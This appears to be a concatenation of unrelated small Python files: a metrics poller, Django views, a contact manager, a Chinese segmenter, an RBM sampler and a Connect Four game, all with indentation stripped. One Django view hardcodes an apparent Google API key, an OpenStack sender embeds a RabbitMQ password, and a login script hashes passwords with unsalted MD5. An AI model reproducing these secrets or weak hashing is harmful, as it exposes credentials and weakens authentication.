logger.info("wrote %d points" % len(body))
if __name__ == '__main__':
FORMAT = '%(asctime)-15s %(message)s'
logging.basicConfig(format=FORMAT, level=logging.INFO)
logger.info("starting")
domain_name = os.environ.get('HIFI_DOMAIN_NAME')
sleep_interval = int(os.environ.get('HIFI_SLEEP_INTERVAL', 3))
client_kwargs = {
'host': os.environ.get('HIFI_INFLUX_HOST', 'localhost'),
'port': int(os.environ.get('HIFI_INFLUX_PORT', '8086')),
'username': os.environ.get('HIFI_INFLUX_USERNAME'),
'password': os.environ.get('HIFI_INFLUX_PASSWORD'),
'database': os.environ.get('HIFI_INFLUX_DATABASE', 'domain_stats'),
}
if client_kwargs:
if not client_kwargs['username']:
del client_kwargs['username']
if not client_kwargs['password']:
del client_kwargs['password']
logger.debug("creating request")
request = DomainRequester(
'%s.highfidelity.io' % domain_name,
auth=MetaverseAuth(os.environ.get('HIFI_META_USERNAME'),
os.environ.get('HIFI_META_PASSWORD'))
)
logger.debug("created request")
while 1:
logger.debug("starting loop")
ts = time.time()
logger.debug("write stats")
write_stats(request, client_kwargs)
sleep_for = sleep_interval - (time.time() - ts)
logger.info("sleeping for %.02f secs" % sleep_for)
time.sleep(max(sleep_for, 0))
|
def cheese_and_crackers(cheese_amount, boxes_of_crackers):
print(f"You have {cheese_amount} cheeses! ")
print(f"You have {boxes_of_crackers} boxes of crackers! ")
print("Man that's not enough for a party!")
print("Get a blanket. \n")
print("We cab just give the functiond numbers directly:")
cheese_and_crackers(20, 30)
print("OR, we can use variables from our script:")
amount_of_cheese = 10
amount_of_crackers = 50
cheese_and_crackers(amount_of_cheese, amount_of_crackers)
print("We can even do math inside too:")
cheese_and_crackers(10 + 20, 5 + 6)
print("And we can comine two, variable and math:")
cheese_and_crackers(amount_of_cheese + 100, amount_of_crackers + 1000)
|
from django.http import HttpResponse
from django.views.generic import (
CreateView,
DetailView,
ListView,
DeleteView
)
import urllib.request
import json
from django.views import View
from django.shortcuts import render, get_object_or_404
from django.urls import reverse
from .models import Usuarios
from .form import UsuarioForm
class UsuarioListView(ListView):
template_name = 'lista_usuarios.html'
queryset = Usuarios.objects.all()
class UsuariosCreateView(CreateView):
template_name = 'crear_usuarios.html'
form_class = UsuarioForm
def form_valid(self, form):
return super().form_valid(form)
class UsuarioGeocodificar(View):
def get(self, request, *args, **kwargs):
queryset = Usuarios.objects.all()
for i in queryset:
if i.longitud is (0 or None) and i.latitud is (0 or None):
print('holaaaa')
endpoint = 'https://maps.googleapis.com/maps/api/geocode/json?'
api_key = 'AIzaSyAYVHSbEo-Rh1qBeOOk_BKiXns7bzVniyQ'
direccion = i.direccion
direccion = direccion.replace(' ', '+')
ciudad = i.ciudad
ciudad = ciudad.replace(' ', '+')
_request = endpoint + 'address=' + direccion+','+ciudad + '&key=' + api_key
response = urllib.request.urlopen(_request).read()
response_clear = json.loads(response)
if response_clear['results'] is []:
i.estadogeo = 0
i.save()
else:
i.longitud = response_clear['results'][0]['geometry']['location']['lng']
i.latitud = response_clear['results'][0]['geometry']['location']['lat']
i.save()
return HttpResponse('Exitoso!!')
class UsuariosDeleteView(DeleteView):
template_name = 'eliminar_usuarios.html'
def get_object(self):
id_ = self.kwargs.get("id")
return get_object_or_404(Usuarios, id=id_)
def get_success_url(self):
return reverse('lista-usuarios')
class UsuarioDetailView(DetailView):
template_name = 'detalles_usuarios.html'
def get_object(self):
id_ = self.kwargs.get("id")
print(id_)
return get_object_or_404(Usuarios, id=id_) |
#-*- coding:utf8 -*-
import time
import datetime
import json
from celery.task import task
from celery import Task
from django.conf import settings
from common.utils import update_model_fields
|
from ._version import __version__
from .main import *
from .data.velocity import VelBinner
|
from model.model import Model
from view.view import View
class Controller:
# Constructor
def __init__(self):
self.model = Model()
self.view = View()
#Contacto Controllers
def agregar_contacto(self, id_contacto, nombre, tel, correo, dir):
e, c = self.model.agregar_contacto(id_contacto, nombre, tel, correo, dir)
if e:
self.view.agregar_contacto(c)
else:
self.view.contacto_ya_existe(c)
def leer_contacto(self, id_contacto):
e, c = self.model.leer_contactos(id_contacto)
if e:
self.view.mostrar_contacto(c)
else:
self.view.contacto_no_existe(id_contacto)
def leer_todos_contactos(self):
c = self.model.leer_todos_contactos()
self.view.mostrar_contactos(c)
def actualizar_contacto(self, id_contacto, n_nombre = '', n_tel = '', n_correo = '', n_dir = ''):
e = self.model.actualizar_contacto(id_contacto, n_nombre, n_tel , n_correo , n_dir )
if e:
self.view.actualizar_contacto(id_contacto)
else:
self.view.contacto_no_existe(id_contacto)
def borrar_contacto(self, id_contacto):
e, c = self.model.borrar_contacto(id_contacto)
if e:
self.view.borrar_contacto(c)
else:
self.view.contacto_no_existe(id_contacto)
def leer_contactos_letra(self, letra):
c = self.model.leer_contactos_letra(letra)
self.view.mostrar_contactos(c)
#----------------- Citas Controller ----------------------------#
def agregar_cita(self, id_cita, id_contacto, lugar, fecha, hora, asunto):
e, c = self.model.agregar_cita(id_cita, id_contacto, lugar, fecha, hora, asunto)
if e:
self.view.agregar_cita(c)
else:
self.view.cita_no_existe(c)
def leer_cita(self, id_cita):
e, c = self.model.leer_cita(id_cita)
if e:
self.view.mostrar_cita(c)
else:
self.view.cita_no_existe(id_cita)
def leer_todos_citas(self):
c = self.model.leer_todos_contactos()
self.view.mostrar_contactos(c)
def actualizar_Cita(self, id_cita, id_ncontacto = '', n_lugar = '', n_fecha = '', n_hora = '', n_asunto = ''):
e = self.model.actualizar_Cita(id_cita, id_ncontacto, n_lugar, n_fecha, n_hora, n_asunto)
if e:
self.view.actualizar_contacto(id_cita)
else:
self.view.contacto_no_existe(id_cita)
def borrar_cita(self, id_cita):
e, c = self.model.borrar_cita(id_cita)
if e:
self.view.borrar_cita(c)
else:
self.view.cita_no_existe(id_cita)
def buscar_cita(self, fecha):
c = self.model.buscar_cita(fecha)
self.view.mostrar_cita(c)
# General methods
def insertar_contactos(self):
self.agregar_contacto(1, 'Francisco Zárate', '473-162-1246', 'fm.zaratelopez@ugto.mx', 'Juan Rojas Gonzales')
self.agregar_contacto(2, 'Carlos Canno', '464-145-1835', 'cano@hotmail.com', 'Vulcano')
self.agregar_contacto(3, 'Jonathan Hernandez', '464-132-1235', 'jonathan@gmail.com', 'Arteaga no 6')
'''
def insertar_citas(self):
self.agregar_cita(1, 1, 'Dicis', '17/02/2020', '15:30', 'Sistemas')
self.agregar_cita(2, 2, 'Escuela', '20/11/2020', '20:30', 'NLP')
self.agregar_cita(3, 1, 'Centro', '18/03/2020', '13:30', 'Trabajo')
'''
def start(self):
# Display a welcome message
self.view.start()
# Insertar data in model
self.insertar_contactos()
#self.insertar_citas()
#Show all contacts in DB
self.leer_todos_contactos()
#self.leer_contactos_letra('a')
def write_contact(self):
id = input("ID: ")
n = str(input("Ingrese nombre: "))
t = str(input("Ingrese telefono: "))
c = str(input("Ingrese correo: "))
d = str(input("Direccion: "))
self.agregar_contacto(id, n, t, c, d)
def search_contacto(self):
letra = str(input('Ingresa letra a buscar: '))
self.leer_contactos_letra(letra)
def delete_contacto(self):
id = input("Id contacto a borrar: ")
self.borrar_contacto(id)
def update_contaco(self):
print("Si no desea modificar alguna parte del contacto presiona enter")
id_contacto = input("Inserte el id del contacto que desea modificar:")
n_nombre = str(input("Inserte el nuevo nombre:"))
n_tel = str(input("Inserte el nuevo telefono:"))
n_correo = str(input("Inserte el nuevo correo:"))
n_dir = str(input("Inserte el nuevo direccion:"))
self.actualizar_contacto(id_contacto, n_nombre , n_tel , n_correo , n_dir )
def menu(self):
#Display menu
self.view.menu()
o = input('Selecciona una opcion (1-9): ')
if o == '1':
self.write_contact()
elif o == '2':
self.search_contacto()
elif o == '3':
self.update_contaco()
elif o == '4':
pass
elif o == '5':
pass
elif o == '6':
pass
elif o == '7':
pass
elif o == '8':
pass
elif o == '9':
self.view.end()
else:
self.view.opcion_no_valida() |
# -*- coding: utf-8 -*-
import mmseg
from hmm import hmm
PUNCS = '。《,》?/·「」:;‘’“”|、{}`~!@#¥……&×()-——=+\n'
ALPHA = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
NUM = '0123456789'
HANNUM = '零一二两三四五六七八九十百千万亿兆几.%'
CUTTING = '极是比于在由从给到不没未了过着的地得这那其第来去很都刚和与及而向之乎哉也所啊吗吧啦呀么你我他上下左右又'
def special_dealing(chars, next_word):
result = []
buf = []
end_with_alpha = False
def dealing(buf):
if buf != []:
result.extend(hmm.output(''.join(buf)))
for char in chars:
if char in CUTTING:
dealing(buf)
result.append(char)
buf = []
else:
if char in ALPHA:
if not end_with_alpha:
end_with_alpha = True
dealing(buf)
buf = []
elif end_with_alpha:
result.append(''.join(buf))
buf = []
end_with_alpha = False
buf.append(char)
if end_with_alpha:
result.append(''.join(buf))
elif buf != []:
result.extend(hmm.output(''.join(buf)))
return result
def main(lines):
final = []
for line in mmseg.main(lines):
buf = []
result = []
end_with_num = False
for word in line:
if end_with_num:
i = 0
while i < len(word):
if word[i] in HANNUM or word[i] in NUM or word[i] == '点':
buf[-1] += word[i]
i += 1
else:
break
if i < len(word):
result.extend(buf)
result.append(word[i:])
buf = []
end_with_num = False
elif len(word) == 1 and word not in PUNCS and word not in NUM and word not in HANNUM:
buf.append(word)
else:
if len(buf) <= 1:
result.extend(buf)
else:
result.extend(special_dealing(buf, word))
buf = []
if len(word) == 1 and (word in NUM or word in HANNUM):
end_with_num = True
buf.append(word)
else:
result.append(word)
if len(buf) <= 1:
result.extend(buf)
else:
result.extend(special_dealing(buf, word))
final.extend(result)
return final
def test():
print(' '.join(main(open("input.txt", encoding="utf-8").read())))
if __name__ == '__main__':
test()
|
from django.contrib.auth.models import AbstractUser
from django.db import models
from products.models import Product, Category
from address.models import Address
# from computations.models import CostCalc, DiscountCalc
# from values.models import SellQuantity
class CustomUser(AbstractUser):
first_name = models.CharField(max_length=55, verbose_name='Имя')
middle_name = models.CharField(max_length=55, verbose_name='Фамилия')
last_name = models.CharField(max_length=55, verbose_name='Отчество')
# Полный пиздец, нужно будет переделать
# sell_quantity = models.ForeignKey(SellQuantity, on_delete=models.CASCADE)
def __str__(self):
return self.email
class Profile(models.Model):
user = models.OneToOneField(CustomUser, on_delete=models.CASCADE)
phone = models.SmallIntegerField(blank=True, null=True,
verbose_name='Номер телефона')
address = models.ForeignKey(Address, on_delete=models.CASCADE)
products = models.ForeignKey(Product, on_delete=models.SET_NULL,
null=True, verbose_name='Продукт')
category = models.ForeignKey(Category, on_delete=models.SET_NULL,
null=True, verbose_name='Категория')
sell_quantity = models.DecimalField(max_digits=5, decimal_places=2,
verbose_name='Кол-во продукции')
def __str__(self):
return str(self.phone)
class Meta:
# unique_together = ['user', 'profile']
verbose_name = 'Профиль'
verbose_name_plural = 'Профили'
|
#!/usr/bin/env python
from oslo_config import cfg
import oslo_messaging
import json
import sys
import logging
__author__ = 'Yuvv'
def send_msg(pub_id, e_type, content):
transport = oslo_messaging.get_transport(
cfg.CONF,
'rabbit://openstack:yuvv@controller:5672')
notifier = oslo_messaging.Notifier(transport,
driver='messaging',
topic='DR')
notifier2 = notifier.prepare(publisher_id=pub_id)
notifier2.info(ctxt={},
event_type=e_type,
payload=content)
if __name__ == '__main__':
logging.basicConfig(filename='/var/log/mylog/sender.log', filemode='a',
level=logging.INFO,
format='%(asctime)s %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S %p')
if len(sys.argv) == 2:
try:
msg = json.loads(sys.argv[1])
logging.info('Get a msg of type %s from %s', msg['etype'], msg['pubid'])
send_msg(msg['pubid'],
msg['etype'],
msg['content'])
logging.info('Send msg OK!')
except Exception as e:
logging.error(e.message)
else:
logging.info('Arguments number wrong! Message doesn\'t send.')
'''
python mysend.py '{"pubid":"glance","etype":"delete","content":{"image_id":"1d16c432-1690-49a1-bdfc-4c51438f44f8","value":"file:///var/lib/glance/images/1d16c432-1690-49a1-bdfc-4c51438f44f8"}}'
''' |
"""GeoPySpark package constants."""
from os import path
"""GeoPySpark version."""
VERSION = '0.3.0'
"""Backend jar name."""
JAR = 'geotrellis-backend-assembly-' + VERSION + '.jar'
"""The current location of this file."""
CWD = path.abspath(path.dirname(__file__))
|
# para el próximo día: encapsulamos código
def desglose(total,tipo_iva):
bi=round(total/(1+tipo_iva/100),2)
print(bi)
print('+',round(bi*tipo_iva/100,2),sep='')
print('-----')
print(round(bi*(1+tipo_iva/100),2))
desglose(100,7)
'''
100
+21
---
121
'''
'''
n=3
for i in range(n):
print(i)
'''
'''
for j in range(1,11):
print('Tabla del ',j)
for i in range(1,11):
if i!=5:
print(j,' x ',i,' = ',j*i)
''' |
#python微博爬虫(爬取微博股票大V)
class
|
from lxml import html
import cssselect
import glob
import sys
link_list = glob.glob("./www.allitebooks.org/*")
for filename in link_list:
try:
content = open(filename).read()
tree = html.fromstring(content)
except UnicodeError:
print("error: " + filename)
continue
except:
print("Unexpected error:", sys.exc_info()[0])
pass
hrefs = tree.cssselect('span.download-links a')
for href in hrefs:
print(href.attrib['href'])
|
'''
File: boltz_mnist_sample.py
Author: Hadayat Seddiqi
Date: 03.22.15
Description: Sample trained restricted Boltzmann machine using CD.
'''
import numpy as np
import scipy.io as sio
import matplotlib
import matplotlib.pyplot as plt
import cPickle as pk
import boltzhad.boltzmann as boltz
from boltzhad.utils import tile_raster_images
import matplotlib.animation as anim
import PIL.Image as Image
# def logit(x):
# x[np.where(np.abs(x) < 30)[0]] = 1.0/(1.0 + np.exp(-x[np.abs(x) < 30]))
# x[x > 30] = 1
# x[x < -30] = 0
# return x
def logit(x):
""" Return output of the logistic function. """
return 1.0/(1.0 + np.exp(-x))
classes = range(10)
nperclass = 1
kupdown = 100
nhidrow, nhidcol = 8, 28
# sample a test image
d = sio.loadmat('figs_boltz_mnist/model.mat')
W = d['w']
# vbias = np.zeros((784, 1))
# hbias = np.zeros((nhidrow*nhidcol, 1))
vbias = d['v']
hbias = d['h']
# training data
datamat = sio.loadmat('data/mnist_all.mat')
# construct list of training vecs for each class
dtest = np.vstack([ datamat['test'+str(d)][:nperclass]
for d in classes ]).astype(np.float)
# normalize
dtest /= float(255)
# train, valid, test = pk.load(open('mnist.pkl','rb'))
# data = valid
# idxsort = np.argsort(data[1])
pstates = []
state = np.zeros((784+nhidrow*nhidcol, 1))
fig, ax = plt.subplots(2, 2)
# remove annoying axes
for rax in ax:
for kax in rax:
kax.get_xaxis().set_visible(False)
kax.get_yaxis().set_visible(False)
# loop over inputs we're going to start with
for itr in xrange(nperclass*len(classes)):
# get test vector
state[:784] = dtest[itr].reshape(784, 1)
state[784:] = logit(np.dot(W.T, state[:784]) + hbias)
# plot
pvinp = ax[0,0].matshow(1-state[:784].reshape(28,28), cmap='Greys')
phinp = ax[0,1].matshow(1-state[784:].reshape(nhidrow, nhidcol), cmap='Greys')
# pvis = ax[1,0].matshow(1-state[:784].reshape(28,28), cmap='Greys')
# phid = ax[1,1].matshow(1-state[784:].reshape(nhidrow, nhidcol), cmap='Greys')
# animated plot
for k in xrange(kupdown):
hact = logit(np.dot(W.T, state[:784]) + hbias)
state[784:] = hact > np.random.rand(nhidrow*nhidcol, 1)
vact = logit(np.dot(W, state[784:]) + vbias)
state[:784] = vact > np.random.rand(784, 1)
ptitle = ax[1,1].text(0.5, 1.1, "%i Gibbs samples" % k,
horizontalalignment='center',
verticalalignment='bottom',
fontsize=16,
fontweight='bold',
transform=ax[1,1].transAxes)
# pvis = ax[1,0].matshow(1-state[:784].reshape(28,28), cmap='Greys')
# phid = ax[1,1].matshow(1-state[784:].reshape(nhidrow, nhidcol), cmap='Greys')
pvis = ax[1,0].matshow(1-vact.reshape(28,28), cmap='Greys')
phid = ax[1,1].matshow(1-hact.reshape(nhidrow, nhidcol), cmap='Greys')
pstates.append([ptitle, pvis, phid, pvinp, phinp])
ani = anim.ArtistAnimation(fig, pstates, interval=50, blit=False)
print("Saving...")
ani.save('figs_boltz_mnist/samples_animation.gif', writer='imagemagick', fps=30)
print("Saving done.")
plt.show()
|
from blocks.bricks import Identity, Logistic, MLP
from blocks.initialization import Uniform, Constant
from math import sqrt
from theano import tensor
class Autoencoder(MLP):
def __init__(self, ninput, nhidden):
r = sqrt(6) / sqrt(nhidden + ninput + 1)
super(Autoencoder, self).__init__(activations=[Logistic(), Identity()],
dims=[ninput, nhidden, ninput],
weights_init=Uniform(width=r),
biases_init=Constant(0))
def sparsity_regularizer(h, rho, beta):
p_hat = tensor.abs_(h).mean(axis=0)
kl = rho * tensor.log(rho / p_hat) + (1 - rho) * \
tensor.log((1 - rho) / (1 - p_hat))
return beta * kl.sum()
|
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def postorderTraversal(self, root):
"""
:type root: TreeNode
:rtype: List[int]
"""
if root is None:
return
stack1 = []
stack2 = []
output = []
stack1.append(root)
while stack1: # Run while first stack is not empty
node = stack1.pop() # take last element from first stack
stack2.append(node) # and push to second stack
# Push left and right children of
# removed item to stack1
if node.left is not None:
stack1.append(node.left)
if node.right is not None:
stack1.append(node.right)
while stack2: # put value of element to output
node = stack2.pop()
output.append(node.val)
return output
|
# Path to store extracted features
pos_fd_path = 'data/pos_fd'
neg_fd_path = 'data/neg_fd'
pos_fd_test_path = 'data/pos_test'
neg_fd_test_path = 'data/neg_test'
# Path to store model
model_path = 'data/model/car_detector_model.pkl'
# Sliding window parameters
(win_width, win_height) = (100, 40)
step_size = 10
# HOG parameters
orientations = 9
pixels_per_cell = (8, 8)
cells_per_block = (3, 3)
visualise = False
normalise = True
# Pyramid scale amount
scale_amt = 1.25
# Overlap threshold for NMS
overlap_thresh = 0.2
|
import hashlib
def verify(username, password):
credentials = list(open("known_users"))
for user in credentials:
_user = user.strip().split("|||")
if _user[0] == username and _user[1] == password_hash(password):
return True
return False
def username_hash(username):
# Hash alg: ascii repr of the username... xored with a magic number :)
namehash = ""
for c in username:
namehash += str(ord(c) ^ 0xC0FFEE) + "_"
return namehash[:-1]
def password_hash(password):
# Hash alg:
m = hashlib.md5()
m.update(password)
hashpass = m.hexdigest()
return hashpass
def username_dehash(username):
chars = username.split("_")
unhashed = ""
for item in chars:
unhashed += chr(int(item) ^ 0xC0FFEE)
return unhashed
if __name__ == "__main__":
if str(raw_input("Add user? ")) == "YES":
username = str(raw_input("New username: "))
password = str(raw_input("New password: "))
f = open("known_users", 'a')
f.write(username + "|||" + password_hash(password) + "\n")
f.close()
# TO REMOVE DUPLICATE INSTANCES OF USERS
# RUN THE FOLLOWING SHELL COMMANDS
# sort -u known_users | while read line; do echo $line >> known_users_2; done
# mv known_users_2 known_users
|
import os
from collections import defaultdict
import numpy as np
from PIL import Image
import cv2
from torch.utils import data
class PRIDDataset(data.Dataset):
img_directory = 'images'
list_directory = 'lists'
probe_list_footer = 'probe'
gallery_list_footer = 'gallery'
def __init__(self, root_path, targets):
# When the class is used for trainig, "targets" must be list,
# otherwise "targets" must be str
assert type(targets) == list or type(targets) == str
if type(targets) is str:
self.name = targets
probe_list_files = [list_file for list_file in os.listdir(
os.path.join(root_path, self.list_directory)
) if targets in list_file and self.probe_list_footer in list_file]
gallery_list_files = [list_file for list_file in os.listdir(
os.path.join(root_path, self.list_directory)
) if targets in list_file and self.gallery_list_footer in list_file]
assert len(probe_list_files) == len(gallery_list_files)
probe_list_files.sort()
gallery_list_files.sort()
probe_files_for_all_sets = []
gallery_files_for_all_sets = []
for probe_list_file, gallery_list_file in zip(probe_list_files, gallery_list_files):
with open(os.path.join(root_path, self.list_directory, probe_list_file)) as f:
probe_files_for_all_sets.append([line.rstrip('\n') for line in f.readlines()])
with open(os.path.join(root_path, self.list_directory, gallery_list_file)) as f:
gallery_files_for_all_sets.append([line.rstrip('\n') for line in f.readlines()])
self.probe_indices_for_all_sets = [[] for _ in range(len(probe_list_files))]
self.gallery_indices_for_all_sets = [[] for _ in range(len(gallery_list_files))]
targets = [targets]
self.img_files = []
self.identity_labels = []
self.camera_labels = []
self.class_n_imgs = []
class_map = {}
self.n_classes = 0
for target in targets:
img_files = os.listdir(os.path.join(root_path, self.img_directory, target))
img_files.sort()
for img_file in img_files:
self.img_files.append(os.path.join(root_path, self.img_directory, target, img_file))
idx = img_file.split('_')[1]
class_name = target + '_' + idx
if class_name not in class_map:
class_map[class_name] = self.n_classes
self.n_classes += 1
self.class_n_imgs.append(0)
self.identity_labels.append(class_map[class_name])
camera_id = int(img_file.split('_')[3])
self.camera_labels.append(camera_id)
self.class_n_imgs[class_map[class_name]] += 1
if hasattr(self, 'probe_indices_for_all_sets'):
for probe_files, gallery_files, probe_indices, gallery_indices in zip(
probe_files_for_all_sets, gallery_files_for_all_sets,
self.probe_indices_for_all_sets, self.gallery_indices_for_all_sets
):
assert not (img_file in probe_files and img_file in gallery_files)
if img_file in probe_files:
probe_indices.append(len(self.img_files)-1)
elif img_file in gallery_files:
gallery_indices.append(len(self.img_files)-1)
self.class_n_imgs = np.array(self.class_n_imgs)
def __len__(self):
return len(self.img_files)
def __getitem__(self, idx):
img = Image.open(self.img_files[idx])
identity_label = self.identity_labels[idx]
camera_label = self.camera_labels[idx]
return img, identity_label, camera_label
def get_test_set(self):
for probe_indices, gallery_indices in zip(
self.probe_indices_for_all_sets, self.gallery_indices_for_all_sets
):
yield probe_indices, gallery_indices
|
#Eric Ayllon Palazon
import random
def construir_tablero():
"""Funcion que construye el tablero"""
n = input("Introduce n:")
tablero = []
for y in range(n): #creo una matriz para el tablero
fila = []
for x in range(n):
fila.append(0)
tablero.append(fila)
return tablero, n
def mostrar_tablero(tablero):
"""Funcion que muestra el tablero"""
for fila in tablero:
print "",
for i in range(len(fila)):
print "-"*3, " ",
print ""
for celda in fila:
print "|",
if celda == 0:
print " ",
elif celda == 1:
print "X",
else:
print "O",
print "|",
print ""
print "",
for i in range(len(fila)):
print "-"*3, " ",
print ""
# si multiplico un caracter o un string por x, el resultado es x veces el texto multiplicado
def tirar_ficha(tablero, columna, jugador):
"""Funcion para realizar la tirada"""
col = get_columna(tablero, columna)
col = col[::-1] #invierto la columna para obtener desde el final el primer hueco libre
valida = True
try: #compruebo si se puede tirar en esa columna
posicion_valida = len(col) - (col.index(0)+1)
except ValueError: #si no se puede tirar, col.index(0) no devolvera lo que esperamos (un int)
print "No puedes tirar en esa columna"
valida = False
else:
tablero[posicion_valida][columna] = jugador #modifico el tablero en base a la tirada
return tablero, valida
def get_columna(tablero, columna):
"""Funcion para obtener la lista columna a partir de la matriz tablero"""
col = [] #creo una lista
for fila in tablero:
col.append(fila[columna]) #anyado el elemento de la especificada columna a la lista de la columna
return col
def jugada(tablero, njugada, n):
"""Funcion para pedir la jugada"""
if njugada%2 == 0:
jugador = 1
columna = input("Jugador {0} elige columna:".format(jugador))-1
else:
jugador = 2
columna = random.randint(1, n-1)
print "Jugador {0} elige columna:{1}".format(jugador, columna)
tablero, valida = tirar_ficha(tablero, columna, jugador)
mostrar_tablero(tablero)
return valida
def comprobar_fila(fila):
"""Funcion que comprueba si alguien ha conectado una columna"""
i = 0
while i < len(fila):
if fila[i:i+4:] == [1, 1, 1, 1]: #puesto que fila[i:i+4:] es una lista, la comparo con la lista que debe ser para que haya ganado el jugador
return "Jugador 1. Has ganado!!"
elif fila [i:i+4] == [2, 2, 2 ,2]:
return "Jugador 2. Has ganado!!"
i += 1
return "Sigue"
def comprobar_columna(columna):
"""Funcion que comprueba si alguien ha conectado una columna"""
i = 0
while i < len(columna):
if columna[i:i+4:] == [1, 1, 1, 1]:
return "Jugador 1. Has ganado!!"
elif columna [i:i+4] == [2, 2, 2 ,2]:
return "Jugador 2. Has ganado!!"
i += 1
return "Sigue"
def comprobar_diagonal(tablero):
"""Funcion que comprueba si alguien ha conectado una diagonal"""
for y in range(len(tablero)):
for x in range(len(tablero)):
if y+3 < len(tablero):
if x+3 < len(tablero):
if [tablero[y][x], tablero[y+1][x+1], tablero[y+2][x+2], tablero[y+3][x+3]] == [1, 1, 1, 1]: #comparo una lista de longitud 4 y valores correspondientes
# con la diagonal con la lista que debe ser para que haya ganado
# el jugador
return "Jugador 1. Has ganado!!"
elif [tablero[y][x], tablero[y+1][x+1], tablero[y+2][x+2], tablero[y+3][x+3]] == [2, 2, 2, 2]:
return "Jugador 2. Has ganado!!"
if y+3 < len(tablero):
if x-3 >= 0:
if [tablero[y][x], tablero[y+1][x-1], tablero[y+2][x-2], tablero[y+3][x-3]] == [1, 1, 1, 1]:
return "Jugador 1. Has ganado"
elif [tablero[y][x], tablero[y+1][x-1], tablero[y+2][x-2], tablero[y+3][x-3]] == [2, 2, 2, 2]:
return "Jugador 2. Has ganado"
return "Sigue"
def comprobar_estado_partida(tablero):
"""Funcion que comprueba el estado de la partida para ver si ha ganado alguien"""
for fila in tablero:
resultado = comprobar_fila(fila)
if resultado != "Sigue":
return resultado
for i in range(len(tablero)):
columna = get_columna(tablero, i)
resultado = comprobar_columna(columna)
if resultado != "Sigue":
return resultado
# implementar diagonal
resultado = comprobar_diagonal(tablero)
return resultado #devuelve el resultado del analisis del estado de la partida
random.seed()
tablero, n = construir_tablero()
mostrar_tablero(tablero)
njugador = 0
end = False
while end == False:
valida = jugada(tablero, njugador, n)
if valida:
resultado = comprobar_estado_partida(tablero)
if resultado == "Sigue":
njugador += 1
else:
end = True
print resultado
|
with open('target1','w+') as f, open('aux.txt', 'r+') as a:
f.write(a.read())
|
# -*- coding: utf-8 -*-
import os
### Вывод информации в консоль
MDEBUG = True
# MDEBUG = False
### Вывод значений регистров и флагов полученных с MODBUS в textEdit
# MODBUSOUT = True
MODBUSOUT = False
### Текстовый вывод в редактор
TEXTEDIT = False
#TEXTEDIT = True
timer_sec = 3
# установка размера текста в выводе
fontSize = 10
# одноразовые настройки
# зазмеры окна с окном мывода и без
sizeWindowWithEdit = [1120, 650]
sizeWindowWithoutEdit = [800, 650]
# путь к танго-серверу модулятора
server_name = "tango://172.16.21.5:10000/test/rfq/read"
# имя метода получения значений всех регистров и флагов в JSON
json_get = "ReadAllRegistersAndFlagsFromCacheInJson"
# установка времени таймера запроса по модбасу |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.